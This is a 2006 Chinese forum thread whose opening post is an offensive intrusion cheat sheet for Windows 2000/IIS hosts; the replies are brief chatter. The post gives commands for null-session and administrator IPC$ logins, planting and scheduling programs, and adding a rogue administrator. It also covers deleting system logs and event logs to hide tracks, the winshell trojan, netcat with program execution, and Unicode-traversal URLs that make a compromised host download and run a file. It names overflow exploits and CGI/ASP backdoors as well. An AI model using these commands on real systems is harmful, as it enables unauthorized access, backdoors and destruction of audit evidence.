社区应用 最新帖子 精华区 社区服务 会员列表 统计排行 社区论坛任务 迷你宠物
  • 3048阅读
  • 3回复

网管和黑客都必须知道的命令

级别: 总督察
发帖
536
铜板
2493
人品值
302
贡献值
1
交易币
10
好评度
461
信誉值
0
金币
0
所在楼道

网管和黑客都必须知道的命令 Vs)Pg\B?  
常用的几条NET命令: emo@&6*  
}0Qex=vkO  
(与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:"" Wi Mi0?$.  
p#UrZKR  
(以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator" _>8ZL)NQQ  
~e5hfZv|w  
(传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$ ew# t4~hh  
sF$$S/b  
(查看远程主机时间) net time \\IP地址 25RFi24>D  
1o. O]>  
(定时启动某个程序) at \\IP地址 02:18 readme.exe qJb9JL$s  
6.| {l8%r  
(查看共享) net view \\IP地址 :O}=$[  
i"~J -{d}  
(查看netbios工作组列表) nbtstat -A IP地址 9H9 P'lx9  
-rSp gk0wL  
(将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator" j>(O1z 7  
ykv,>nSXLL  
(这两条把自己增加到管理员组): net user 用户名 密码 /add k[0Gz  
|^^'GZ%a  
net localgroup Administrators 用户名 /add _H9.A I  
\YE(E04w57  
(断开连接) net use \\IP地址\ipc$ /delete B 3Y,|*  
?32gug\i'}  
扫尾: yF-EHNNf  
WleE$ ,  
del C:\winnt\system32\logfiles\*.* Nv@SpV'  
]3xb Q1  
del C:\winnt\ssytem32\config\*.evt )_eEM1  
a7+w)]r  
del C:\winnt\system32\dtclog\*.* G=R`O1-3  
~ [ k0ay  
del C:\winnt\system32\*.log ]_6w(>A@3#  
gJEm  
del C:\winnt\system32\*.txt J3OxM--8"  
1&JPyW  
del C:\winnt\*.txt SW!lSIk  
ToWiXH)4  
del C:\winnt\*.log @kCFc}  
5hN`}Ve  
一、netsvc.exe Ib(q9!L  
+>b~nK>M  
下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务: DlHt#Ob7  
[ZC{eg+D  
netsvc /list \\IP地址 v803@9@  
=]k0*\PS  
netsvc schedule \\IP地址 /query ),ur! v  
LO8`qq*rq  
netsvc \\IP地址 schedule /start SJg4P4|  
% ~eIx=s  
二、OpenTelnet.exe TUw+A6u:p  
{O ]^8#v^  
远程启动主机的Telnet服务,并绑定端口到7878,例如: WrB:)Q(8=  
;m<22@,E&  
OpenTelnet \\IP地址 用户名 密码 1 7878 d <{ >&  
{t<E*5N]a  
然后就可以telnet到主机的7878端口,进入DOS方式下: ~:`5Y"Av:  
EDQKbTaPt  
telnet IP地址 7878 !6Sr*a*5  
;L1Q"Hxh  
三、winshell.exe |$*1!pL-QP  
d??;r:  
一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令: dwd5P7  
<$6r1y*G  
p Path (查看winshell主程序的路径信息) {k CCpU  
a_jw4"Sb  
b reBoot (重新启动机器)  .dA_}  
~m:oJ+:O  
d shutDown (关闭机器) (}Q(Ux@X  
>KPxksFR8  
s Shell (执行后你就会看到可爱的“C:\>”) 0,b.;r  
vO>Fj  
x eXit (退出本次登录会话,此命令并不终止winshell的运行) ,sw|OYb  
?A4zIJ\  
CMD> http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上) N|JM L  
t1Ty.F)r  
四、3389登陆器,GUI方式登录远程主机的 nHAET  
eh\_;2P  
五、elsave.exe /V-uo(n< .  
{zd0 7!9y  
事件日志清除工具 O+iNR9O  
''t\J^+&  
elsave -s \\IP地址 -l "application" -C bSa%?laS  
_"_ 21uB  
elsave -s \\IP地址 -l "system" -C %r E:5)  
tuT>,BbR  
elsave -s \\IP地址 -l "security" -C k P]'  
3jSt&+  
执行后成功清除应用程序日志,系统日志,安全日志 I+08tXO  
pco:]3BF6  
六、hbulot.exe G>siyUh  
B*0TM+  
开启win2kserver和winxp的3389服务 Y -yozt  
#mT\B[4h  
hbulot [/r] l k~VvRq  
&>nB@SQZ  
使用/r表示安装完成后自动重起目标使设置生效。 |ry![\  
ZhqGUb  
七、nc.exe(netcat.exe) (,nQ7,2EX  
k4N_Pa$}\  
一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。 E?v9c>c  
,> Ya%;h2k  
想要连接到某处: nc [-options] hostname port[s] [ports] ... A9 *P7  
v11Uw?CM  
绑定端口等待连接: nc -l -p port [-options] [hostname] [port] ]|m?pt  
RSfB9)3D  
参数: + d?p? v  
6!39t  
-e prog 程序重定向,一旦连接,就执行 [危险!!] NUO#[7OK+x  
Wi U-syNh  
-g gateway source-routing hop point[s], up to 8 PiwMl)E|!  
53X i)  
-G num source-routing pointer: 4, 8, 12, ... u~O9"-m !V  
9%#u,I  
-h 帮助信息 SEKR`2Zz,  
2ezk<R5q+  
-i secs 延时的间隔 nYsB^Nr6  
^;8dl.;  
-l 监听模式,用于入站连接 :9H`O!VF  
 !n`9V^`  
-n 指定数字的IP地址,不能用hostname 4h*c{do  
%LM2CgH V  
-o file 记录16进制的传输 "]SA4Ud^  
rF^H\U:w  
-p port 本地端口号 2v$\mL  
C.|.0^5  
-r 任意指定本地及远程端口 q1^bH 6*fl  
&0*7]Wo*  
-s addr 本地源地址 5'<J@3B  
] /"!J6(e  
-u UDP模式 q!10 G  
(X?HuWTm  
-v 详细输出——用两个-v可得到更详细的内容 !We9T)e  
u Vth&4dh9  
-w secs timeout的时间  *KV^ X(/  
gB_gjn\  
-z 将输入输出关掉——用于扫描时 @ ^q}.u`  
八、TFTPD32.EXE WJlJD*3  
~XeWN^l(Ov  
把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如: <)$e*HrI  
.DR*MQI9  
http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名 ([ jm=[E^  
<@S'vcO  
然后可以直接令文件运行: )H1\4LeP  
l5 T0x=y9!  
http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名 2^X<n{0N)  
BCmKzv  
九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。 r1&eA%eh  
iBPIj;,  
一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。 *ZkOZ  
$jg~ a  
一、一 Xscan命令行运行参数说明: RRb>]oD  
H73 r3BH  
在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按"<ctrl+c>"强行关闭程序。 |jI|} ,I  
5(>ux@[qI:  
1.命令格式: xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项] cd&sAK"  
8kf5u#,'  
xscan -file <主机列表文件名> <检测项目> [其他选项] 6Z@?W  
eemC;JV%  
其中<检测项目> 含义如下: mIe 5{.m#  
F2>W{-H+  
-port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表);  \4j(el  
D!DL6l`  
-ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件); P(b ds  
kmg/hNtN  
-ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件); #e[S+a  
2Rqpok4  
-cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案); Ofc u4pi  
$ba*=/{[q  
-iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案); >~l^E!<i-u  
#[&9~za'"m  
[其他选项] 含义如下: (kVxa8 0  
.wO-2h{Q  
-v: 显示详细扫描进度 'kSm}} y  
~}_S]^br  
-p: 跳过Ping不通的主机 Sa-" G`  
?>1wZ  
-o: 跳过没有检测到开放端口的主机 6T5\zInd  
#z61 I"kU  
-t <并发线程数量[,并发主机数量]>: 指定最大并发线程数量和并发主机数量, 默认数量为100,10
评价一下你浏览此帖子的感受

精彩

感动

搞笑

开心

愤怒

无聊

灌水
级别: 店掌柜
发帖
5692
铜板
103378
人品值
1520
贡献值
26
交易币
0
好评度
5373
信誉值
0
金币
0
所在楼道

只看该作者 1 发表于: 2006-03-28
学习····

简单生活
执著追求
别笑我浅溥,天真的以为用一腔真诚就能感动这个冷漠的世界。
也别说我幼稚,竟想用不长的人生去诠释繁杂的红尘。
然而除了真诚,我还能给你什么,的确我真的一无所有!

级别: 终身会员
发帖
1207
铜板
37
人品值
257
贡献值
35
交易币
0
好评度
1278
信誉值
0
金币
0
所在楼道
只看该作者 2 发表于: 2006-03-28
沙发哦 w5vzj%6i  
太专业信工系的都很难看懂
做我自己
做我自己喜欢的事
爱我自己喜欢的人
级别: 终身会员
发帖
690
铜板
11181
人品值
312
贡献值
5
交易币
0
好评度
653
信誉值
0
金币
0
所在楼道
只看该作者 3 发表于: 2006-03-28
努力ing

每個女孩都是一個無淚的天使,當她遇上心愛的男孩是時便有了淚。天使落淚,墜落人間。所以,每一個男孩都不能辜負他的女孩,因爲她曾經爲了你,放棄了整個天堂。
描述
快速回复

您目前还是游客,请 登录注册
温馨提示:欢迎交流讨论,请勿纯表情、纯引用!
认证码:
验证问题:
10+5=?,请输入中文答案:十五